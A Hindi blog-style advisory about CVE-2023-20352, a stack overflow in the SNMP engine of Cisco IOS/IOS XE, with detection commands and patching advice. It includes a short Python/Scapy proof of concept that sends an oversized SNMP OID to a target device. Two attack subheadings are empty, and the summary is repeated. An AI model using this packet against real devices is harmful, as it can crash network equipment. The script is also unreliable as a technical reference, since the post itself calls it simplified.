
CVE-2023-20352 Cisco IOS/IOS XE के SNMP इंजन में एक गंभीर स्टैक ओवरफ़्लो दोष है। केवल तैयार किए गए SNMP पैकेट से, दूरस्थ हमलावर सिस्टम को क्रैश कर सकते हैं या रूट नियंत्रण प्राप्त कर सकते हैं। सभी SNMP संस्करण असुरक्षित हैं - अब पैच करें या पूर्ण समझौता होने का जोखिम उठाएं।
CVE-2023-20352 Cisco IOS/IOS XE के SNMP इंजन में एक गंभीर स्टैक ओवरफ्लो दोष है। केवल तैयार किए गए SNMP पैकेटों से, दूरस्थ हमलावर सिस्टम को क्रैश कर सकते हैं या रूट नियंत्रण हथिया सकते हैं। सभी SNMP संस्करण असुरक्षित हैं - अभी पैच लगाएं या पूर्ण समझौते का जोखिम उठाएं
मार्क मैलिया द्वारा
सिंपल नेटवर्क मैनेजमेंट प्रोटोकॉल (SNMP) नेटवर्क प्रशासन में एक मूलभूत प्रोटोकॉल है, जो सिस्टम प्रशासकों को नेटवर्क डिवाइसों की निगरानी, कॉन्फ़िगरेशन और प्रबंधन करने में सक्षम बनाता है। यह पोर्ट 161 (SNMP अनुरोधों के लिए) और 162 (ट्रैप के लिए) पर काम करता है। SNMP तीन संस्करणों का समर्थन करता है: v1, v2c, और v3, जिनमें से प्रत्येक सुरक्षा के विभिन्न स्तर प्रदान करता है। यह मेरे नज़दीकी विषय से जुड़ता है - मेरी थीसिस SNMP पर केंद्रित थी, और Cisco मेरे दैनिक कार्य में एक स्थायी हिस्सा बना हुआ है।
SNMP की उपयोगिता नेटवर्क पर रीयल-टाइम मॉनिटरिंग, इन्वेंट्री प्रबंधन और दोष का पता लगाने तक फैली हुई है। अपने महत्व के बावजूद, नेटवर्क प्रबंधन में SNMP की भूमिका सुरक्षा जोखिम भी पैदा करती है जब इसे ठीक से सुरक्षित नहीं किया जाता, जैसा कि CVE-2023-20352 भेद्यता में देखा गया है।
CVE-2023-20352 एक उच्च-गंभीरता वाला स्टैक-आधारित बफर ओवरफ्लो दोष है जो Cisco IOS और IOS XE डिवाइसों को प्रभावित करता है। यह SNMP सबसिस्टम में स्थित है, जो नेटवर्क प्रबंधन ट्रैफ़िक को संसाधित करता है।
तकनीकी विवरण:
भेद्यता एक असुरक्षित डिवाइस पर भेजे गए तैयार किए गए SNMP पैकेटों द्वारा ट्रिगर होती है, जिससे अनुचित सीमा जाँच और स्टैक ओवरफ्लो होता है। सभी SNMP संस्करण प्रभावित हैं।
निम्न विशेषाधिकार हमला:
उच्च विशेषाधिकार हमला:
भेद्यताओं का पता लगाने के लिए, प्रशासक निम्नलिखित CLI कमांड का उपयोग कर सकते हैं:
show running-config | include snmp-server community
show running-config | include snmp-server group
show snmp
snmp-server view <view-name> <OID> excluded जैसे कमांड का उपयोग करें।Python और Scapy का उपयोग करते हुए एक अवधारणात्मक PoC शोषण क्षमता प्रदर्शित करता है:
from scapy.all import *
# लक्ष्य IP और SNMP समुदाय स्ट्रिंग से बदलें
target_ip = "192.168.1.1"
community = "public"
# दुर्भावनापूर्ण पैकेट तैयार करें
payload = b"A" * 1024 # ओवरफ्लो बफर
packet = IP(dst=target_ip)/UDP(dport=161)/SNMP(community=community, PDU=SNMPget(varbindlist=[SNMPvarbind(oid=payload)]))
send(packet)
नोट: यह एक सरलीकृत उदाहरण है। वास्तविक शोषण के लिए सटीक पेलोड निर्माण और विशेषाधिकार वृद्धि की आवश्यकता होती है।
CVE-2023-20352 भेद्यता SNMP की महत्वपूर्ण भूमिका और संबंधित जोखिमों को रेखांकित करती है। संगठनों को खतरों को कम करने के लिए पैच लगाने और SNMP कॉन्फ़िगरेशन को सुरक्षित करने को प्राथमिकता देनी चाहिए, ताकि उभरते हमलों के खिलाफ नेटवर्क लचीलापन सुनिश्चित हो सके।